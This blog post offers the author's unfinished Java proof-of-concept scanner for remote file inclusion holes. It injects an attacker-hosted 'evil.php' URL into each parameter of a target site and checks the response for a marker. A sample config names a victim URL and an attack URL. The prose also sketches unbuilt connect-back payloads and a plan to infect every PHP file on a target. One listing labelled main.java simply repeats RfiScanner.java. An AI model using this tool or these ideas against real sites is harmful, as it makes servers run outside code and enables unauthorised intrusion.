[POC] RFI Scanner

Well it certainly is true, why not? That question never has a correct answer imo. It is the same question I asked myself yesterday. I was like thinking what to write on my blog (I was bored and thought that blog writing could help) after a while I just gave up (so lesson learned: only write when you actually have something to write). So today I fired up my browser(for the ones wondering, this is a personal opinion, I use: Opera {FTW!}, IE {nice}, FF {sucks}, I use them depending on what I need) and the first things I saw was this. Which is funny since it’s just a couple of days ago since I posted about python and now I see a nice and small python script to do funky stuff.

So I hadn’t even finished reading and I followed the first link I encountered which is this one. It’s a very nice write up on how to own IIS 5 using “mythical” exploits. So this brought me back to my first question a day earlier: why not? Since I didn’t have an answer for that, here is my never finished source code to scan for RFI(remote file inclusions). The whole reason I started out to code this scanner was because I’m lazy and I thought…why do it myself if I can automate it. If you want a overview about things you should and you shouldn’t automate on a pentest , read this write up.

Basically my todo list when I first wanted to code the scanner was as follow:

• implement looping through params
• implement setting params to evil url with evil php
• check response for specified keyword

Then when I was working on it and I had some better ideas to detect RFI which I then never got around to implement:

• create php which copies an image and renames it to evil.extension, then check if that exists, it’s more reliable then just checking if the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
• create a php which connects back, so the scanner only has to know if there has been a connect back from the ip it’s scanning (only works if allowed)
• create a php which has a time delay, the scanner would then just request the url twice , with and without evil php, and measure time difference
• infect all php files with a header that outputs “hi” then call the url again to clean all php files

So who knows maybe I will one day extend this scanner or maybe I’ll even attempt to rewrite it in python including the features I never got around to implement.

main.java

/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy			_conProxy;
    private boolean			_useProxy;
    private String _SEARCH_WORD;
    private String _vUrl,_aUrl;
    /**
     * @param args
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    public void scan(){
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                try{
                    System.out.println("SCANNING: " + u.toString());
                    BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break;//stop searching
                        }
                    }
                }catch(IOException ioe){
                    //well do nothing
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }        
    }
}

RfiScanner.java

/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy			_conProxy;
    private boolean			_useProxy;
    private String _SEARCH_WORD;
    private String _vUrl,_aUrl;
    /**
     * @param args
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    public void scan(){
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                try{
                    System.out.println("SCANNING: " + u.toString());
                    BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break;//stop searching
                        }
                    }
                }catch(IOException ioe){
                    //well do nothing
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }        
    }
}

PrepareURL.java

/*
 * PrepareURL.java
 * @author DiabloHorn
 */

package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;

/**
 *
 * @author DiabloHorn
 */
public class PrepareURL {
    private static final int _nextItemInitialize = -1;
    private String _victimURL;
    private String _evilUrl;
    private ArrayList<URL> _attackUrlList;
    private int _nextItem;

    /**
     * @param victimUrl	The URL of the site you want to inject stuff into it's params
     * @param attackUrl The "stuff"
     * @throws MalformedURLException Wrong URL
     */
    public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {
        this._victimURL = victimUrl;
        this._evilUrl = attackUrl;
        _nextItem = _nextItemInitialize;
        fillList();
    }

    /**
     * @return True if there is another element left, false otherwise
     */
    public boolean hasNext() {
        if(_nextItem == (_attackUrlList.size()-1)) {
            return false;
        }

        return true;
    }

    /**
     * @return Get the next url
     */
    public URL next() {
        _nextItem++;
        return _attackUrlList.get(_nextItem);
    }

    /**
     * This resets the class so you can loop again through the URL's
     */
    public void reset() {
        _nextItem = _nextItemInitialize;
    }

    private void fillList() throws MalformedURLException {

        String query = _victimURL.substring(_victimURL.indexOf("?")+1);
        _attackUrlList = new ArrayList<URL>();
        if(query != null) {
            HashMap<String,String> paramPairs = getParameters(query);
            Set<String> paramNames = paramPairs.keySet();
            Iterator<String> iParamNames = paramNames.iterator();
            String str;
            while(iParamNames.hasNext()) {
                str = iParamNames.next();
                _attackUrlList.add(new URL(_victimURL.replace(str+"="+paramPairs.get(str), str+"="+_evilUrl)));
            }
        }
    }

    /**
     * @param query The query to be stripped down to parameters and it's values
     * @return A HashMap with paramname:paramvalue
     */
    private HashMap<String,String> getParameters(String query) {
        HashMap<String,String> paramPairs = new HashMap<String,String>();

        String[] rawPairs = query.split("&");
        for(int i=0;i<rawPairs.length;i++) {
            String[] keyValue = rawPairs[i].split("=");
            for(int z=0;z<keyValue.length;z+=2) {
                paramPairs.put(keyValue[z], keyValue[z+1]);
            }
        }

        return paramPairs;
    }
}

config.properties

# Remote RFI Scanner Configuration File
#---MAIN SECTION
#victim url aka target
vurl=http://www.google.com/search?hl=en&q=sdfsdf&btnG=Google+Search
#attack url aka the url where you host the file to be included
aurl=http://www.live.com/evil.php
#the string that must be searched in the reponse page
searchstring=EVILRFIFOUND
#---PROXY SECTION
#uncomment the lines below if you want to use a proxy
#proxy address must be numeric
#proxy_type=SOCKS|HTTP
#proxy_address=1.1.1.1
#proxy_port=8569

---

Possibly related posts: (automatically generated)

• Mapping Java 5 enums with Hibernate
• Mexico’s Game Plan